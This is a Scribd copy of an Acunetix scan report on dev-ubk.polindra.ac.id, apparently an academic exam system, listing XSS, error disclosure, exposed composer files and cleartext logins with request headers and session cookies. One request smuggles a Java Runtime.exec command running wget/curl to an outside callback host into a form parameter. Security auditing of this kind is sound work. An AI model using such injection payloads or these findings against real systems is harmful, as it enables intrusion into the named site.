Scribd
Upload
110 views59 pages

Developer HTTP Dev Ubk Polindra Ac Id Dashboard

An Acunetix security audit of the dev-ubk.polindra.ac.id site found 31 alerts, including 7 high severity issues. High severity vulnerabilities discovered could allow a malicious user to compromise the backend database or deface the website. Specific issues found include cross-site scripting, exposure of application error messages, disclosure of development configuration files, unencrypted connections, and clear text transmission of user credentials.

Uploaded by

Winda Jayatri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
110 views59 pages

Developer HTTP Dev Ubk Polindra Ac Id Dashboard

An Acunetix security audit of the dev-ubk.polindra.ac.id site found 31 alerts, including 7 high severity issues. High severity vulnerabilities discovered could allow a malicious user to compromise the backend database or deface the website. Specific issues found include cross-site scripting, exposure of application error messages, disclosure of development configuration files, unencrypted connections, and clear text transmission of user credentials.

Uploaded by

Winda Jayatri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 59

Developer

Report
Acunetix Security Audit

2023-07-30

Generated by Acunetix

1
Scan of dev-ubk.polindra.ac.id
Scan details
Scan information
Start time 2023-07-29T23:22:50.178384+07:00
Start url http://dev-ubk.polindra.ac.id/dashboard
Host dev-ubk.polindra.ac.id
Scan time 122 minutes, 19 seconds
Profile Full Scan
Server information Apache
Responsive True
Server OS Unknown
Application build 14.7.220401065

Threat level

Acunetix Threat Level 3

One or more high-severity type vulnerabilities have been discovered by the scanner. A malicious user can exploit these
vulnerabilities and compromise the backend database and/or deface your website.

Alerts distribution

Total alerts found 31


High 7
Medium 6
Low 4
Informational 14

2
Alerts summary

Cross site scripting

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-79
Affected items Variation
/jurusan/add 1
/kelasdosen/save 2
/ujian/save 4

Application error messages

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None

3
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-209
Affected items Variation
Web Server 1

Development configuration files

Classification
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N
Base Score: 3.1
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-538
Affected items Variation
Web Server 1

Unencrypted connection

Classification

4
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Base Score: 5.4
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: Low
Availability Impact: None
Base Score: 5.8
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-319
Affected items Variation
Web Server 1

User credentials are sent in clear text

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
Base Score: 4.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined

5
CWE CWE-523
Affected items Variation
Web Server 1

Vulnerable JavaScript libraries

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Base Score: 6.5
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: Low
Availability Impact: None
Base Score: 6.4
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-937
Affected items Variation
Web Server 2

Clickjacking: X-Frame-Options header

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Base Score: 5.8
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Changed
Confidentiality Impact: None
Integrity Impact: Low
Availability Impact: None

6
Base Score: 4.3
Access Vector: Network_accessible
Access Complexity: Medium
Authentication: None
Confidentiality Impact: None
Integrity Impact: Partial
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-1021
Affected items Variation
Web Server 1

Composer installed.json publicly accessible

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Base Score: 5.8
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Changed
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-200
Affected items Variation
Web Server 1

Cookies with missing, inconsistent or contradictory properties

Classification

7
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-284
Affected items Variation
Web Server 1

Cookies without HttpOnly flag set

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined

8
CWE CWE-1004
Affected items Variation
Web Server 1

Content Security Policy (CSP) not implemented

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Changed
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-1021
Affected items Variation
Web Server 1

Content type is not specified

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None

9
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

File uploads

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

No HTTP Redirection

Classification

10
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Changed
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

Outdated JavaScript libraries

Classification
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: High
Privileges Required: None
CVSS3
User Interaction: Required
Scope: Changed
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: High
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined

11
CWE CWE-937
Affected items Variation
Web Server 7

Possible server path disclosure (Unix)

Classification
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Base Score: 5.3
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: Low
Integrity Impact: None
Availability Impact: None
Base Score: 5.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-200
Affected items Variation
Web Server 1

Reverse proxy detected

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None

12
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

Web Application Firewall detected

Classification
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
Base Score: 0.0
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
CVSS3
User Interaction: None
Scope: Unchanged
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
Base Score: 0.0
Access Vector: Network_accessible
Access Complexity: Low
Authentication: None
Confidentiality Impact: None
Integrity Impact: None
Availability Impact: None
CVSS2 Exploitability: Not_defined
Remediation Level: Not_defined
Report Confidence: Not_defined
Availability Requirement: Not_defined
Collateral Damage Potential: Not_defined
Confidentiality Requirement: Not_defined
Integrity Requirement: Not_defined
Target Distribution: Not_defined
CWE CWE-16
Affected items Variation
Web Server 1

13
Alerts details

Cross site scripting

Severity High
Reported by module /Scripts/PerScheme/XSS.script

Description

Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into
a legitimate website or web application. XSS occurs when a web application makes use of unvalidated or unencoded user
input within the output it generates.

Impact

Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local
storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then
impersonate that user.

Furthermore, JavaScript can read and make arbitrary modifications to the contents of a page being displayed to a user.
Therefore, XSS in conjunction with some clever social engineering opens up a lot of possibilities for an attacker.

Recommendation

Apply context-dependent encoding and/or validation to user input rendered on a page

References

Cross-site Scripting (XSS) Attack - Acunetix (https://www.acunetix.com/websitesecurity/cross-site-scripting/)


Types of XSS - Acunetix (https://www.acunetix.com/websitesecurity/xss/)
XSS Filter Evasion Cheat Sheet (https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)
Excess XSS, a comprehensive tutorial on cross-site scripting (https://excess-xss.com/)
Cross site scripting (https://en.wikipedia.org/wiki/Cross-site_scripting )

Affected items

/jurusan/add
Details
URL encoded POST input banyak was set to 1<WUFIU1>FBJER[!+!]</WUFIU1>

The input is reflected inside a text element.


Request headers

14
POST /jurusan/add HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Content-Type: application/x-www-form-urlencoded

Content-Length: 92

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

banyak=1<WUFIU1>FBJER[!%2B!]
</WUFIU1>&csrf_test_name=4ed74fb416d4267315513d24ece04ca2&input=
/kelasdosen/save
Details
URL encoded POST input dosen_id was set to 1<WFMGFS>BB6Y0[!+!]</WFMGFS>

The input is reflected inside a text element.


Request headers
POST /kelasdosen/save HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Content-Type: application/x-www-form-urlencoded

Content-Length: 111

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1<WFMGFS>BB6Y0[!%2B!]
</WFMGFS>&kelas_id[]=1&method=add

15
/kelasdosen/save
Details
URL encoded POST input kelas_id[] was set to 1<WNDSMB>JLHRI[!+!]</WNDSMB>

The input is reflected inside a text element.


Request headers
POST /kelasdosen/save HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Content-Type: application/x-www-form-urlencoded

Content-Length: 111

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1&kelas_id[]=1<WNDSMB>JLHRI[!%2B
!]</WNDSMB>&method=add
/ujian/save
Details
URL encoded POST input benar was set to 4<W9LYZV>FZV4C[!+!]</W9LYZV>

The input is reflected inside a text element.


Request headers

16
POST /ujian/save HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Content-Type: application/x-www-form-urlencoded

Content-Length: 330

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

benar=4<W9LYZV>FZV4C[!%2B!]
</W9LYZV>&csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1&jenis=acak&jumlah_so
al_1=1&jumlah_soal_2=1&jumlah_soal_3=1&jumlah_soal_4=1&mapel_order_1=1&mapel_order_2=1&ma
pel_order_3=1&mapel_order_4=1&matkul_id=1&method=add&nama_ujian=1&salah=-1&tgl_mulai=1&tg
l_selesai=1&tidak_terjawab=0&waktu=1
/ujian/save
Details
URL encoded POST input dosen_id was set to 1<WB28WQ>BW43E[!+!]</WB28WQ>

The input is reflected inside a text element.


Request headers

17
POST /ujian/save HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Content-Type: application/x-www-form-urlencoded

Content-Length: 330

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

benar=4&csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1<WB28WQ>BW43E[!%2B!]
</WB28WQ>&jenis=acak&jumlah_soal_1=1&jumlah_soal_2=1&jumlah_soal_3=1&jumlah_soal_4=1&mape
l_order_1=1&mapel_order_2=1&mapel_order_3=1&mapel_order_4=1&matkul_id=1&method=add&nama_u
jian=1&salah=-1&tgl_mulai=1&tgl_selesai=1&tidak_terjawab=0&waktu=1
/ujian/save
Details
URL encoded POST input matkul_id was set to 1<WJHBEE>BUKT2[!+!]</WJHBEE>

The input is reflected inside a text element.


Request headers

18
POST /ujian/save HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Content-Type: application/x-www-form-urlencoded

Content-Length: 330

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

benar=4&csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1&jenis=acak&jumlah_soal
_1=1&jumlah_soal_2=1&jumlah_soal_3=1&jumlah_soal_4=1&mapel_order_1=1&mapel_order_2=1&mape
l_order_3=1&mapel_order_4=1&matkul_id=1<WJHBEE>BUKT2[!%2B!]
</WJHBEE>&method=add&nama_ujian=1&salah=-1&tgl_mulai=1&tgl_selesai=1&tidak_terjawab=0&wak
tu=1
/ujian/save
Details
URL encoded POST input salah was set to -1<WHFK7N>0QHPY[!+!]</WHFK7N>

The input is reflected inside a text element.


Request headers

19
POST /ujian/save HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Content-Type: application/x-www-form-urlencoded

Content-Length: 330

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

benar=4&csrf_test_name=4ed74fb416d4267315513d24ece04ca2&dosen_id=1&jenis=acak&jumlah_soal
_1=1&jumlah_soal_2=1&jumlah_soal_3=1&jumlah_soal_4=1&mapel_order_1=1&mapel_order_2=1&mape
l_order_3=1&mapel_order_4=1&matkul_id=1&method=add&nama_ujian=1&salah=-1<WHFK7N>0QHPY[!%2
B!]</WHFK7N>&tgl_mulai=1&tgl_selesai=1&tidak_terjawab=0&waktu=1

Application error messages

Severity Medium
Reported by module /Scripts/PerScheme/Error_Message.script

Description

This alert requires manual confirmation

Acunetix found one or more error/warning messages. Application error or warning messages may expose sensitive
information about an application's internal workings to an attacker.
These messages may also contain the location of the file that produced an unhandled exception.
Consult the 'Attack details' section for more information about the affected page(s).

Impact

Error messages may disclose sensitive information which can be used to escalate attacks.

Recommendation

Verify that these page(s) are disclosing error or warning messages and properly configure the application to log errors to a
file instead of displaying the error to the user.

References

PHP Runtime Configuration (https://www.php.net/manual/en/errorfunc.configuration.php#ini.display-errors)


Improper Error Handling (https://www.owasp.org/index.php/Improper_Error_Handling)

Affected items

20
Web Server
Details
Application error messages:

http://dev-ubk.polindra.ac.id/users/edit_info
Unknown column 'Array' in 'where clause'

http://dev-ubk.polindra.ac.id/ujian/save
Unknown column 'Array' in 'where clause'

Request headers
POST /users/edit_info HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/dashboard

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Content-Type: application/x-www-form-urlencoded

Content-Length: 273

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

csrf_test_name=4ed74fb416d4267315513d24ece04ca2&email=sample%40email.tst&first_name=ooJpi
ued&id[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('wget+http://hitnu
mchbgnhd.bxss.me/||curl+http://hitnumchbgnhd.bxss.me/')]=1&last_name=ooJpiued&username=oo
Jpiued

Development configuration files

Severity Medium
Reported by module /Scripts/PerFolder/Development_Files.script

Description

One or more configuration files (e.g. Vagrantfile, Gemfile, Rakefile, ...) were found. These files may expose sensitive
information that could help a malicious user to prepare more advanced attacks. It's recommended to remove or restrict
access to this type of files from production systems.

Impact

These files may disclose sensitive information. This information can be used to launch further attacks.

21
Recommendation

Remove or restrict access to all configuration files acessible from internet.

Affected items

Web Server
Details
Development configuration files:

http://dev-ubk.polindra.ac.id/composer.json

composer.json => Composer configuration file. Composer is a dependency manager for PH

http://dev-ubk.polindra.ac.id/composer.lock

composer.lock => Composer lock file. Composer is a dependency manager for PHP.

Request headers
GET /composer.json HTTP/1.1

Cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

Unencrypted connection

Severity Medium
Reported by module /RPA/no_https.js

Description

This scan target was connected to over an unencrypted connection. A potential attacker can intercept and modify data sent
and received from this site.

Impact

Possible information disclosure.

Recommendation

The site should send and receive data over a secure (HTTPS) connection.

Affected items

22
Web Server
Verified vulnerability
Details

Request headers
GET /assets/dist/js/adminlte.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=lo6jkenpsbkc3nfjivejeg4hte020chk

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

User credentials are sent in clear text

Severity Medium
Reported by module /Crawler/12-Crawler_User_Credentials_Plain_Text.js

Description

User credentials are transmitted over an unencrypted channel. This information should always be transferred via an
encrypted channel (HTTPS) to avoid being intercepted by malicious users.

Impact

A third party may be able to read the user credentials by intercepting an unencrypted HTTP connection.

Recommendation

Because user credentials are considered sensitive information, should always be transferred to the server over an
encrypted connection (HTTPS).

Affected items

Web Server
Details

23
Forms with credentials sent in clear text:

http://dev-ubk.polindra.ac.id/auth

Form name: <empty>


Form action: http://dev-ubk.polindra.ac.id/auth/cek_login
Form method: POST
Password input: pass

Request headers
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=4ed74fb416d4267315513d24ece04ca2;
ci_session=3f9tr3v47igiu9sbroignqd22i3rm4c5

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like


Gecko) Chrome/99.0.4844.0 Safari/537.36

Vulnerable JavaScript libraries

Severity Medium
Reported by module /Scripts/PerFile/Javascript_Libraries_Audit.script

Description

You are using one or more vulnerable JavaScript libraries. One or more vulnerabilities were reported for this version of the
library. Consult Attack details and Web References for more information about the affected library and the vulnerabilities
